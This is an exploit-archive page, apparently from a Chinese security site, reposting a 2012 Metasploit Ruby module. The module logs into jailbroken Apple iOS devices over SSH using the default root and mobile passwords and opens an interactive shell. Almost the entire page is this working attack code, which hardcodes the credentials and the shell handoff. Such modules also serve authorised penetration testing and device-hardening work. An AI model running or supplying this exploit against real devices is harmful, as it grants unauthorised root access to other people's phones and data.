Apple iOS Default SSH Password

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Apple iOS Default SSH Password

来源：http://www.metasploit.com 作者：hdm 发布时间：2012-10-10

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'net/ssh'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Auxiliary::CommandShell

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Apple iOS Default SSH Password Vulnerability",
			'Description'    => %q{
				This module exploits the default credentials of Apple iOS when it
				has been jailbroken and the passwords for the 'root' and 'mobile'
				users have not been changed.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'hdm'
				],
			'References'     =>
				[

				],
			'DefaultOptions'  =>
				{
					'ExitFunction' => "none"
				},
			'Payload'        =>
				{
					'Compat' => {
						'PayloadType'    => 'cmd_interact',
						'ConnectionType' => 'find'
					}
				},
			'Platform'       => 'unix',
			'Arch'           => ARCH_CMD,
			'Targets'        =>
				[
					['Apple iOS', { 'accounts' => [ [ 'root', 'alpine' ], [ 'mobile', 'dottie' ]] } ],
				],
			'Privileged'     => true,
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RHOST(),
				Opt::RPORT(22)
			], self.class
		)

		register_advanced_options(
			[
				OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
				OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
			]
		)
	end


	def rhost
		datastore['RHOST']
	end


	def rport
		datastore['RPORT']
	end


	def do_login(user, pass)
		opts = {
			:auth_methods => ['password', 'keyboard-interactive'],
			:msframework  => framework,
			:msfmodule    => self,
			:port         => rport,
			:disable_agent => true,
			:config => false,
			:password => pass,
			:record_auth_info => true,
			:proxies => datastore['Proxies']
		}

		opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']

		begin
			ssh = nil
			::Timeout.timeout(datastore['SSH_TIMEOUT']) do
				ssh = Net::SSH.start(rhost, user, opts)
			end
		rescue Rex::ConnectionError, Rex::AddressInUse
			return
		rescue Net::SSH::Disconnect, ::EOFError
			print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
			return
		rescue ::Timeout::Error
			print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
			return
		rescue Net::SSH::AuthenticationFailed
			print_error "#{rhost}:#{rport} SSH - Failed authentication"
		rescue Net::SSH::Exception => e
			print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
			return
		end

		if ssh
			conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true)
			ssh = nil
			return conn
		end

		return nil
	end


	def exploit
		self.target['accounts'].each do |info|
			user,pass = info
			print_status("#{rhost}:#{rport} - Attempt to login as '#{user}' with password '#{pass}'")
			conn = do_login(user, pass)
			if conn
				print_good("#{rhost}:#{rport} - Login Successful with '#{user}:#{pass}'")
				handler(conn.lsock)
				break
			end
		end
	end
end

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告